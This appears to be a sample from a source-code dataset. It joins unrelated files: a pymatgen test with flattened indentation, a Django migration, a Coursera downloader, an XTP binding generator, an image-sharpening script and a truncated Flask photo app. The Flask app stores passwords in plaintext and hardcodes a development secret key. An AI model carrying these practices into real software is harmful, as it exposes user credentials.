from pymatgen.io.qchem.outputs import QCOutput, check_for_structure_changes
from pymatgen.util.testing import PymatgenTest
try:
from openbabel import openbabel
openbabel # reference openbabel so it's not unused import
have_babel = True
except ImportError:
have_babel = False
__author__ = "Samuel Blau, Brandon Wood, Shyam Dwaraknath, Evan Spotte-Smith"
__copyright__ = "Copyright 2018, The Materials Project"
__version__ = "0.1"
single_job_dict = loadfn(os.path.join(os.path.dirname(__file__), "single_job.json"))
multi_job_dict = loadfn(os.path.join(os.path.dirname(__file__), "multi_job.json"))
property_list = {
"errors",
"multiple_outputs",
"completion",
"unrestricted",
"using_GEN_SCFMAN",
"final_energy",
"S2",
"optimization",
"energy_trajectory",
"opt_constraint",
"frequency_job",
"charge",
"multiplicity",
"species",
"initial_geometry",
"initial_molecule",
"SCF",
"Mulliken",
"optimized_geometry",
"optimized_zmat",
"molecule_from_optimized_geometry",
"last_geometry",
"molecule_from_last_geometry",
"geometries",
"gradients",
"frequency_mode_vectors",
"walltime",
"cputime",
"point_group",
"frequencies",
"IR_intens",
"IR_active",
"g_electrostatic",
"g_cavitation",
"g_dispersion",
"g_repulsion",
"total_contribution_pcm",
"ZPE",
"trans_enthalpy",
"vib_enthalpy",
"rot_enthalpy",
"gas_constant",
"trans_entropy",
"vib_entropy",
"rot_entropy",
"total_entropy",
"total_enthalpy",
"warnings",
"SCF_energy_in_the_final_basis_set",
"Total_energy_in_the_final_basis_set",
"solvent_method",
"solvent_data",
"using_dft_d3",
"single_point_job",
"force_job",
"pcm_gradients",
"CDS_gradients",
"RESP",
"trans_dip",
"transition_state",
"scan_job",
"optimized_geometries",
"molecules_from_optimized_geometries",
"scan_energies",
"scan_constraint_sets",
"hf_scf_energy",
"mp2_energy",
"ccsd_correlation_energy",
"ccsd_total_energy",
"ccsd(t)_correlation_energy",
"ccsd(t)_total_energy",
}
if have_babel:
property_list.add("structure_change")
single_job_out_names = {
"unable_to_determine_lambda_in_geom_opt.qcout",
"thiophene_wfs_5_carboxyl.qcout",
"hf.qcout",
"hf_opt_failed.qcout",
"no_reading.qcout",
"exit_code_134.qcout",
"negative_eigen.qcout",
"insufficient_memory.qcout",
"freq_seg_too_small.qcout",
"crowd_gradient_number.qcout",
"quinoxaline_anion.qcout",
"tfsi_nbo.qcout",
"crowd_nbo_charges.qcout",
"h2o_aimd.qcout",
"quinoxaline_anion.qcout",
"crowd_gradient_number.qcout",
"bsse.qcout",
"thiophene_wfs_5_carboxyl.qcout",
"time_nan_values.qcout",
"pt_dft_180.0.qcout",
"qchem_energies/hf-rimp2.qcout",
"qchem_energies/hf_b3lyp.qcout",
"qchem_energies/hf_ccsd(t).qcout",
"qchem_energies/hf_cosmo.qcout",
"qchem_energies/hf_hf.qcout",
"qchem_energies/hf_lxygjos.qcout",
"qchem_energies/hf_mosmp2.qcout",
"qchem_energies/hf_mp2.qcout",
"qchem_energies/hf_qcisd(t).qcout",
"qchem_energies/hf_riccsd(t).qcout",
"qchem_energies/hf_tpssh.qcout",
"qchem_energies/hf_xyg3.qcout",
"qchem_energies/hf_xygjos.qcout",
"qchem_energies/hf_wb97xd_gen_scfman.qcout",
"new_qchem_files/pt_n2_n_wb_180.0.qcout",
"new_qchem_files/pt_n2_trip_wb_90.0.qcout",
"new_qchem_files/pt_n2_gs_rimp2_pvqz_90.0.qcout",
"new_qchem_files/VC_solv_eps10.2.qcout",
"crazy_scf_values.qcout",
"new_qchem_files/N2.qcout",
"new_qchem_files/julian.qcout.gz",
"new_qchem_files/Frequency_no_equal.qout",
"new_qchem_files/gdm.qout",
"new_qchem_files/DinfH.qout",
"new_qchem_files/mpi_error.qout",
"new_qchem_files/molecule_read_error.qout",
"new_qchem_files/basis_not_supported.qout",
"new_qchem_files/lebdevpts.qout",
"new_qchem_files/Optimization_no_equal.qout",
"new_qchem_files/2068.qout",
"new_qchem_files/2620.qout",
"new_qchem_files/1746.qout",
"new_qchem_files/1570.qout",
"new_qchem_files/1570_2.qout",
"new_qchem_files/single_point.qout",
"new_qchem_files/roothaan_diis_gdm.qout",
"new_qchem_files/pes_scan_single_variable.qout",
"new_qchem_files/pes_scan_double_variable.qout",
"new_qchem_files/ts.out",
"new_qchem_files/ccsd.qout",
"new_qchem_files/ccsdt.qout",
}
multi_job_out_names = {
"not_enough_total_memory.qcout",
"new_qchem_files/VC_solv_eps10.qcout",
"new_qchem_files/MECLi_solv_eps10.qcout",
"pcm_solvent_deprecated.qcout",
"qchem43_batch_job.qcout",
"ferrocenium_1pos.qcout",
"CdBr2.qcout",
"killed.qcout",
"aux_mpi_time_mol.qcout",
"new_qchem_files/VCLi_solv_eps10.qcout",
}
class TestQCOutput(PymatgenTest):
@staticmethod
def generate_single_job_dict():
"""
Used to generate test dictionary for single jobs.
"""
single_job_dict = {}
for file in single_job_out_names:
single_job_dict[file] = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", file)).data
dumpfn(single_job_dict, "single_job.json")
@staticmethod
def generate_multi_job_dict():
"""
Used to generate test dictionary for multiple jobs.
"""
multi_job_dict = {}
for file in multi_job_out_names:
outputs = QCOutput.multiple_outputs_from_file(
QCOutput, os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", file), keep_sub_files=False
)
data = []
for sub_output in outputs:
data.append(sub_output.data)
multi_job_dict[file] = data
dumpfn(multi_job_dict, "multi_job.json")
def _test_property(self, key, single_outs, multi_outs):
for name, outdata in single_outs.items():
try:
self.assertEqual(outdata.get(key), single_job_dict[name].get(key))
except ValueError:
self.assertArrayEqual(outdata.get(key), single_job_dict[name].get(key))
for name, outputs in multi_outs.items():
for ii, sub_output in enumerate(outputs):
try:
self.assertEqual(sub_output.data.get(key), multi_job_dict[name][ii].get(key))
except ValueError:
self.assertArrayEqual(sub_output.data.get(key), multi_job_dict[name][ii].get(key))
def test_all(self):
self.maxDiff = None
single_outs = {}
for file in single_job_out_names:
single_outs[file] = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", file)).data
multi_outs = {}
for file in multi_job_out_names:
multi_outs[file] = QCOutput.multiple_outputs_from_file(
QCOutput, os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", file), keep_sub_files=False
)
for key in property_list:
print("Testing ", key)
self._test_property(key, single_outs, multi_outs)
    @unittest.skipIf(not have_babel, "OpenBabel not installed.")
def test_structural_change(self):
t1 = Molecule.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "structural_change", "t1.xyz"))
t2 = Molecule.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "structural_change", "t2.xyz"))
t3 = Molecule.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "structural_change", "t3.xyz"))
thio_1 = Molecule.from_file(
os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "structural_change", "thiophene1.xyz")
)
thio_2 = Molecule.from_file(
os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "structural_change", "thiophene2.xyz")
)
frag_1 = Molecule.from_file(
os.path.join(
PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "test_structure_change", "frag_1.xyz"
)
)
frag_2 = Molecule.from_file(
os.path.join(
PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "test_structure_change", "frag_2.xyz"
)
)
self.assertEqual(check_for_structure_changes(t1, t1), "no_change")
self.assertEqual(check_for_structure_changes(t2, t3), "no_change")
self.assertEqual(check_for_structure_changes(t1, t2), "fewer_bonds")
self.assertEqual(check_for_structure_changes(t2, t1), "more_bonds")
self.assertEqual(check_for_structure_changes(thio_1, thio_2), "unconnected_fragments")
self.assertEqual(check_for_structure_changes(frag_1, frag_2), "bond_change")
def test_NBO_parsing(self):
data = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "nbo.qout")).data
self.assertEqual(len(data["nbo_data"]["natural_populations"]), 3)
self.assertEqual(len(data["nbo_data"]["hybridization_character"]), 4)
self.assertEqual(len(data["nbo_data"]["perturbation_energy"]), 2)
self.assertEqual(data["nbo_data"]["natural_populations"][0]["Density"][5], -0.08624)
self.assertEqual(data["nbo_data"]["hybridization_character"][-1]["atom 2 pol coeff"][35], "-0.7059")
next_to_last = list(data["nbo_data"]["perturbation_energy"][-1]["fock matrix element"].keys())[-2]
self.assertEqual(data["nbo_data"]["perturbation_energy"][-1]["fock matrix element"][next_to_last], 0.071)
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor type"][0], "RY*")
def test_NBO7_parsing(self):
data = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "nbo7_1.qout")).data
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["perturbation energy"][9], 15.73)
self.assertEqual(len(data["nbo_data"]["perturbation_energy"][0]["donor bond index"].keys()), 84)
self.assertEqual(len(data["nbo_data"]["perturbation_energy"][1]["donor bond index"].keys()), 29)
data = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "nbo7_2.qout")).data
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["perturbation energy"][13], 32.93)
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor type"][13], "LV")
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor type"][12], "RY")
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor atom 1 symbol"][12], "Mg")
data = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "nbo7_3.qout")).data
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["perturbation energy"][13], 34.54)
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor type"][13], "BD*")
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor atom 1 symbol"][13], "B")
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor atom 2 symbol"][13], "Mg")
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor atom 2 number"][13], 3)
def test_NBO5_vs_NBO7_hybridization_character(self):
data5 = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "nbo5_1.qout")).data
data7 = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "nbo7_1.qout")).data
self.assertEqual(
len(data5["nbo_data"]["hybridization_character"]), len(data7["nbo_data"]["hybridization_character"])
)
self.assertEqual(
data5["nbo_data"]["hybridization_character"][3]["atom 2 pol coeff"][9],
data7["nbo_data"]["hybridization_character"][3]["atom 2 pol coeff"][9],
)
self.assertEqual(
data5["nbo_data"]["hybridization_character"][0]["s"][0],
data7["nbo_data"]["hybridization_character"][0]["s"][0],
)
self.assertEqual(data5["nbo_data"]["hybridization_character"][1]["bond index"][7], "149")
self.assertEqual(data7["nbo_data"]["hybridization_character"][1]["bond index"][7], "21")
if __name__ == "__main__":
unittest.main()
|
materialsproject/pymatgen
|
pymatgen/io/qchem/tests/test_outputs.py
|
Python
|
mit
| 12,614
|
# Generated by Django 2.0.4 on 2018-04-23 18:09
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('slug', models.SlugField(blank=True, max_length=150, verbose_name='Slug')),
('photo', models.ImageField(blank=True, upload_to='accounts/profiles', verbose_name='Foto')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'Usuario',
'verbose_name_plural': 'Usuarios',
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
|
snicoper/django-boilerplate
|
src/apps/accounts/migrations/0001_initial.py
|
Python
|
mit
| 3,042
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-06-30 12:30
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('features', '0009_merge_20170613_1205'),
]
operations = [
migrations.AddField(
model_name='calculation',
name='features',
field=models.ManyToManyField(blank=True, to='features.Feature'),
),
]
|
KDD-OpenSource/fexum
|
features/migrations/0010_calculation_features.py
|
Python
|
mit
| 484
|
## Coursera_Downloader
## MIT License, 2014 Gurjot S. Sidhu
## Runs on Python 3.x using the urllib module
import time
import urllib.request as urr
import os
from shutil import copyfileobj
# Enter the link to the directory where you want the downloaded files to be saved
download_directory = "/home/user/Lectures"
# Enter the download url
link = "https://class.coursera.org/algo-004/lecture/download.mp4?lecture_id="
# Enter the increment for the ticker according to the pattern
ticker = 2
# Set a buffer time based on file size and download speed
buffer_time = 400
# OPTIONAL : If you don't want the downloaded files to have their original lecture names, you can name them as Lecture 1,2,3 ... (Although I have no idea why anyone would want to do that)
retain_original_names = True
## Kick back and relax
os.chdir(download_directory)
def download():
count = 0
# Set the limits of the range according to the "id" keys
    for i in range(1, 2000, ticker):  # step by the ticker so the ids follow the pattern
count += 1
try:
if retain_original_names:
urr.urlretrieve(link + str(i))
else:
urr.urlretrieve(link + str(i), "Lecture " + str(count))
except AttributeError:
with urr.urlopen(link + str(i)) as in_data, open("Lecture " + str(count), 'wb') as out_video:
copyfileobj(in_data, out_video)
time.sleep(buffer_time)
print (str(count) + " videos have been downloaded.")
# Removing any temporary files left behind
urr.urlcleanup()
##############################################################################################################
## Known Issues
## If the downloaded files are named "Lecture 1,2,3 ..." even though retain_original_names is set to True -
## 1. Python Org has finally deprecated the urlretrieve attribute
## 2. I still haven't figured out how to scrape Coursera's website
##############################################################################################################
|
gsidhu/Coursera_Downloader
|
downloader_v3x.py
|
Python
|
mit
| 1,939
|
# encoding: UTF-8
from __future__ import print_function
__author__ = 'CHENXY'
from string import join
from xtp_struct_quote import structDict
from xtp_struct_common import structDict as structDict2
structDict.update(structDict2)
#----------------------------------------------------------------------
def replaceTabs(f):
"""把Tab用4个空格替代"""
l = []
for line in f:
line = line.replace('\t', ' ')
l.append(line)
return l
def processCallBack(line):
orignalLine = line
    line = line.replace(' virtual void ', '') # remove the unneeded text at the start of the line
    line = line.replace('{};\n', '') # remove the unneeded text at the end of the line
content = line.split('(')
    cbName = content[0] # callback function name
cbName = cbName.strip()
    cbArgs = content[1] # callback function arguments
if cbArgs[-1] == ' ':
cbArgs = cbArgs.replace(') ', '')
else:
cbArgs = cbArgs.replace(')', '')
    cbArgsList = cbArgs.split(', ') # turn the arguments into a list
cbArgsTypeList = []
cbArgsValueList = []
    for arg in cbArgsList: # start processing the arguments
content = arg.split(' ')
if len(content) > 1:
            cbArgsTypeList.append(content[0]) # list of argument types
            cbArgsValueList.append(content[1]) # list of argument names
createTask(cbName, cbArgsTypeList, cbArgsValueList, orignalLine)
createProcess(cbName, cbArgsTypeList, cbArgsValueList)
    # generate the process section of the .h file
process_line = 'void process' + cbName[2:] + '(Task *task);\n'
fheaderprocess.write(process_line)
fheaderprocess.write('\n')
    # generate the on section of the .h file
#if 'OnRspError' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict error, int id, bool last) {};\n'
#elif 'OnRsp' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict data, dict error, int id, bool last) {};\n'
#elif 'OnRtn' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict data) {};\n'
#elif 'OnErrRtn' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict data, dict error) {};\n'
#else:
#on_line = ''
if line.count('*') == 1:
on_line = 'virtual void on' + cbName[2:] + '(dict data) {};\n'
elif line.count('*') == 2:
on_line = 'virtual void on' + cbName[2:] + '(dict data, dict error, bool last) {};\n'
elif line.count('*') == 0:
on_line = 'virtual void on' + cbName[2:] + '() {};\n'
else:
on_line = ''
fheaderon.write(on_line)
fheaderon.write('\n')
    # generate the wrapper section
createWrap(cbName, line)
#----------------------------------------------------------------------
def createWrap(cbName, line):
"""在Python封装段代码中进行处理"""
# 生成.h文件中的on部分
#if 'OnRspError' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict error, int id, bool last)\n'
#override_line = '("on' + cbName[2:] + '")(error, id, last);\n'
#elif 'OnRsp' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict data, dict error, int id, bool last)\n'
#override_line = '("on' + cbName[2:] + '")(data, error, id, last);\n'
#elif 'OnRtn' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict data)\n'
#override_line = '("on' + cbName[2:] + '")(data);\n'
#elif 'OnErrRtn' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict data, dict error)\n'
#override_line = '("on' + cbName[2:] + '")(data, error);\n'
#else:
#on_line = ''
if line.count('*') == 1:
on_line = 'virtual void on' + cbName[2:] + '(dict data)\n'
override_line = '("on' + cbName[2:] + '")(data);\n'
elif line.count('*') == 2:
on_line = 'virtual void on' + cbName[2:] + '(dict data, dict error, bool last)\n'
override_line = '("on' + cbName[2:] + '")(data, error, last);\n'
elif line.count('*') == 0:
on_line = 'virtual void on' + cbName[2:] + '()\n'
override_line = '("on' + cbName[2:] + '")();\n'
else:
on_line = ''
    if on_line != '':
fwrap.write(on_line)
fwrap.write('{\n')
fwrap.write(' try\n')
fwrap.write(' {\n')
fwrap.write(' this->get_override'+override_line)
fwrap.write(' }\n')
fwrap.write(' catch (error_already_set const &)\n')
fwrap.write(' {\n')
fwrap.write(' PyErr_Print();\n')
fwrap.write(' }\n')
fwrap.write('};\n')
fwrap.write('\n')
def createTask(cbName, cbArgsTypeList, cbArgsValueList, orignalLine):
    # build a Task object from the callback and push it onto the queue
funcline = orignalLine.replace(' virtual void ', 'void ' + apiName + '::')
funcline = funcline.replace('{};', '')
ftask.write(funcline)
ftask.write('{\n')
ftask.write(" Task* task = new Task();\n")
ftask.write(" task->task_name = " + cbName.upper() + ";\n")
    # define constants
global define_count
fdefine.write("#define " + cbName.upper() + ' ' + str(define_count) + '\n')
define_count = define_count + 1
    # switch-case section
fswitch.write("case " + cbName.upper() + ':\n')
fswitch.write("{\n")
fswitch.write(" this->" + cbName.replace('On', 'process') + '(task);\n')
fswitch.write(" break;\n")
fswitch.write("}\n")
fswitch.write("\n")
for i, type_ in enumerate(cbArgsTypeList):
if type_ == 'int':
ftask.write(" task->task_id = " + cbArgsValueList[i] + ";\n")
elif type_ == 'bool':
ftask.write(" task->task_last = " + cbArgsValueList[i] + ";\n")
elif 'XTPRI' in type_:
ftask.write("\n")
ftask.write(" if (error_info)\n")
ftask.write(" {\n")
ftask.write(" " + type_ + ' *task_error = new ' + type_ + '();\n')
ftask.write(" " + '*task_error = ' + cbArgsValueList[i] + ';\n')
ftask.write(" task->task_error = task_error;\n")
ftask.write(" }\n")
ftask.write("\n")
else:
ftask.write("\n")
ftask.write(" if (" + cbArgsValueList[i][1:] + ")\n")
ftask.write(" {\n")
ftask.write(" " + type_ + ' *task_data = new ' + type_ + '();\n')
ftask.write(" " + '*task_data = ' + cbArgsValueList[i] + ';\n')
ftask.write(" task->task_data = task_data;\n")
ftask.write(" }\n")
ftask.write(" this->task_queue.push(task);\n")
ftask.write("};\n")
ftask.write("\n")
def createProcess(cbName, cbArgsTypeList, cbArgsValueList):
    # pop the task from the queue and convert it into a Python dict
fprocess.write("void " + apiName + '::' + cbName.replace('On', 'process') + '(Task *task)' + "\n")
fprocess.write("{\n")
fprocess.write(" PyLock lock;\n")
onArgsList = []
for i, type_ in enumerate(cbArgsTypeList):
if 'XTPRI' in type_:
fprocess.write(" "+ "dict error;\n")
fprocess.write(" if (task->task_error)\n")
fprocess.write(" {\n")
fprocess.write(" "+ type_ + ' *task_error = (' + type_ + '*) task->task_error;\n')
struct = structDict[type_]
for key in struct.keys():
fprocess.write(" "+ 'error["' + key + '"] = task_error->' + key + ';\n')
fprocess.write(" delete task->task_error;\n")
fprocess.write(" }\n")
fprocess.write("\n")
onArgsList.append('error')
elif type_ in structDict:
fprocess.write(" "+ "dict data;\n")
fprocess.write(" if (task->task_data)\n")
fprocess.write(" {\n")
fprocess.write(" "+ type_ + ' *task_data = (' + type_ + '*) task->task_data;\n')
struct = structDict[type_]
for key, value in struct.items():
if value != 'enum':
fprocess.write(" "+ 'data["' + key + '"] = task_data->' + key + ';\n')
else:
fprocess.write(" "+ 'data["' + key + '"] = (int)task_data->' + key + ';\n')
fprocess.write(" delete task->task_data;\n")
fprocess.write(" }\n")
fprocess.write("\n")
onArgsList.append('data')
elif type_ == 'bool':
onArgsList.append('task->task_last')
elif type_ == 'int':
onArgsList.append('task->task_id')
onArgs = join(onArgsList, ', ')
fprocess.write(' this->' + cbName.replace('On', 'on') + '(' + onArgs +');\n')
fprocess.write(' delete task;\n')
fprocess.write("};\n")
fprocess.write("\n")
def processFunction(line):
    line = line.replace(' virtual int ', '') # remove the unneeded text at the start of the line
    line = line.replace(') = 0;\n', '') # remove the unneeded text at the end of the line
content = line.split('(')
    fcName = content[0] # function name
    fcArgs = content[1] # function arguments
fcArgs = fcArgs.replace(')', '')
    fcArgsList = fcArgs.split(', ') # turn the arguments into a list
fcArgsTypeList = []
fcArgsValueList = []
    for arg in fcArgsList: # start processing the arguments
content = arg.split(' ')
if len(content) > 1:
            fcArgsTypeList.append(content[0]) # list of argument types
            fcArgsValueList.append(content[1]) # list of argument names
if len(fcArgsTypeList)>0 and fcArgsTypeList[0] in structDict:
createFunction(fcName, fcArgsTypeList, fcArgsValueList)
    # generate the request-function section of the .h file
if 'Req' in fcName:
req_line = 'int req' + fcName[3:] + '(dict req, int nRequestID);\n'
fheaderfunction.write(req_line)
fheaderfunction.write('\n')
def createFunction(fcName, fcArgsTypeList, fcArgsValueList):
type_ = fcArgsTypeList[0]
struct = structDict[type_]
ffunction.write('int QuoteApi::req' + fcName[3:] + '(dict req, int nRequestID)\n')
ffunction.write('{\n')
ffunction.write(' ' + type_ +' myreq = ' + type_ + '();\n')
ffunction.write(' memset(&myreq, 0, sizeof(myreq));\n')
for key, value in struct.items():
if value == 'string':
line = ' getString(req, "' + key + '", myreq.' + key + ');\n'
elif value == 'char':
line = ' getChar(req, "' + key + '", &myreq.' + key + ');\n'
elif value == 'int':
line = ' getInt(req, "' + key + '", &myreq.' + key + ');\n'
elif value == 'double':
line = ' getDouble(req, "' + key + '", &myreq.' + key + ');\n'
ffunction.write(line)
ffunction.write(' int i = this->api->' + fcName + '(&myreq, nRequestID);\n')
ffunction.write(' return i;\n')
ffunction.write('};\n')
ffunction.write('\n')
#########################################################
apiName = 'QuoteApi'
fcpp = open('xtp_quote_api.h', 'r')
ftask = open('xtp_md_task.cpp', 'w')
fprocess = open('xtp_md_process.cpp', 'w')
ffunction = open('xtp_md_function.cpp', 'w')
fdefine = open('xtp_md_define.cpp', 'w')
fswitch = open('xtp_md_switch.cpp', 'w')
fheaderprocess = open('xtp_md_header_process.h', 'w')
fheaderon = open('xtp_md_header_on.h', 'w')
fheaderfunction = open('xtp_md_header_function.h', 'w')
fwrap = open('xtp_md_wrap.cpp', 'w')
define_count = 1
for line in replaceTabs(fcpp):
if "virtual void On" in line:
processCallBack(line)
elif "virtual int" in line:
processFunction(line)
fcpp.close()
ftask.close()
fprocess.close()
ffunction.close()
fswitch.close()
fdefine.close()
fheaderprocess.close()
fheaderon.close()
fheaderfunction.close()
fwrap.close()
print('md functions done')
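# Illustrative note: for a header line such as
#     '    virtual void OnDepthMarketData(XTPMD *market_data) {};\n'
# processCallBack() writes a Task-queue wrapper into xtp_md_task.cpp, a
# '#define ONDEPTHMARKETDATA <n>' constant, a matching switch case, and,
# because the line contains exactly one '*', the declaration
#     'virtual void onDepthMarketData(dict data) {};'
# into xtp_md_header_on.h. The callback and struct names here are illustrative only.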
|
rrrrrr8/vnpy
|
vnpy/api/xtp/pyscript/generate_md_functions.py
|
Python
|
mit
| 12,218
|
#!/usr/bin/env python
import os, sys, re, csv,subprocess
def sharpen_image(img, destdir=None):
import subprocess,re,os,sys
regex_coded = re.compile(r'^.+?/[1-9][0-9]{8}_[1-6]\.jpg$')
regex_alt = re.compile(r'^.+?/[1-9][0-9]{8}_\w+?0[1-6]\.[JjPpNnGg]{3}$')
regex_valid_style = re.compile(r'^.+?/[1-9][0-9]{8}_?.*?\.[JjPpNnGg]{3}$')
if not destdir:
destdir = os.path.dirname(img)
#imgdestpng_out = os.path.join(tmp_processing, os.path.basename(imgsrc_jpg))
os.chdir(os.path.dirname(img))
format = img.split('.')[-1]
os.chdir(os.path.dirname(img))
## Destination name
if not destdir:
destdir = os.path.abspath('.')
else:
destdir = os.path.abspath(destdir)
outfile = os.path.join(destdir, img.split('/')[-1].split('.')[0] + '.png')
subprocess.call([
'convert',
'-format',
format,
"-colorspace",
"LAB",
img,
'-define',
'png:preserve-colormap',
'-define',
        'png:format=png24',
        '-define',
        'png:compression-level=N',
        '-define',
        'png:compression-strategy=N',
        '-define',
        'png:compression-filter=N',
'-format',
'png',
# "-filter",
# "Spline",
'-unsharp',
"-1x1.2+0.50+0.0087",
"-colorspace",
"sRGB",
'-quality',
'95',
os.path.abspath(img)
])
#os.rename(img,outfile)
print 'Done {}'.format(img)
return os.path.join(destdir, img.split('/')[-1].split('.')[0] + '.png')
if __name__ == '__main__':
    sharpen_image(sys.argv[1], destdir=None)  # image path supplied on the command line
|
relic7/prodimages
|
python/do_sharpen_only_img.py
|
Python
|
mit
| 1,816
|
import os
import base64
from sqlite3 import dbapi2 as sqlite3
from flask import Flask, request, session, g, redirect, url_for, abort, \
    render_template, flash, send_from_directory
current_location = os.path.dirname(os.path.realpath(__file__))+'/'
app = Flask(__name__)
# Load default config and override config from an environment variable
app.config.update(dict(
DATABASE=current_location + 'db/database.sqlite',
DEBUG=True,
SECRET_KEY='development key',
))
app.config.from_envvar('FLASKR_SETTINGS', silent=True)
## --- database-related stuff ---
def connect_db():
"""Connects to the specific database."""
rv = sqlite3.connect(app.config['DATABASE'])
rv.row_factory = sqlite3.Row
return rv
def init_db():
"""Creates the database tables."""
with app.app_context():
new_db = False
if not os.path.exists(app.config['DATABASE']):
new_db = True
db = get_db()
if new_db:
with app.open_resource('db/schema.sql', mode='r') as f:
db.cursor().executescript(f.read())
db.commit()
def get_db():
"""Opens a new database connection if there is none yet for the
current application context.
"""
if not hasattr(g, 'sqlite_db'):
g.sqlite_db = connect_db()
return g.sqlite_db
@app.teardown_appcontext
def close_db(error):
"""Closes the database again at the end of the request."""
if hasattr(g, 'sqlite_db'):
g.sqlite_db.close()
## ---
def new_file_name(i = 0):
location = 'static/photos/'+str(i)+'.jpg'
if os.path.exists(location):
return new_file_name(i + 1)
else:
return location
# Utility page to load static files
@app.route('/static/<path:filename>')
def static_files(filename):
return send_from_directory('static/', filename)
# Login page
@app.route('/', methods=['GET'])
def login():
return render_template('login.html')
# Check login
@app.route('/', methods=['POST'])
def do_login():
db = get_db()
username = request.form['username']
password = request.form['password']
credentials = db.execute('SELECT id_person FROM person WHERE username=? AND password=?', [username, password]).fetchone()
if credentials == None:
flash("Invalid Log In")
return render_template('login.html')
else:
session['logged_in'] = True
session['username'] = username
session['user_id'] = credentials[0]
return redirect(url_for('record'))
# Logout Page
@app.route('/logout')
def logout():
if 'username' not in session:
return redirect(url_for('login'))
session.pop('logged_in', None)
session.pop('username', None)
flash('You were logged out')
return redirect(url_for('login'))
# Page for registration
@app.route('/register', methods=['GET'])
def register():
return render_template('register.html')
@app.route('/register', methods=['POST'])
def do_register():
db = get_db()
username = request.form['username']
password = request.form['password']
password2 = request.form['password2']
user = db.execute("SELECT * FROM person WHERE username=?", [username]).fetchone()
if user != None:
flash("Username is already taken")
return render_template('register.html')
if password != password2:
flash('Error - passwords did not match!')
return render_template('register.html')
else:
db.execute('INSERT INTO person (username, password) VALUES (?, ?)', (username, password))
db.commit()
return render_template('login.html')
# Default page that allows user to take pictures and upload them
@app.route("/record")
def record():
if 'username' not in session:
return redirect(url_for('login'))
return render_template('record.htm')
# Page for server to receive photos
@app.route('/receive_photo/', methods=['POST'])
def receive_photo():
if 'username' not in session:
return redirect(url_for('login'))
# Save photo
file_location = new_file_name()
f = open(file_location, 'wb')
raw_data = request.form['img']
cleaned_data = raw_data[raw_data.find(',')+1:]
f.write(base64.decodestring(cleaned_data))
f.close()
user_id = session['user_id']
db = get_db()
db.execute('INSERT INTO food (file_location, trackperson, annotation) VALUES (?, ?, ?)',
[file_location, user_id, ''])
db.commit()
return ''
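# Illustrative note: the client is expected to POST a form field named 'img'
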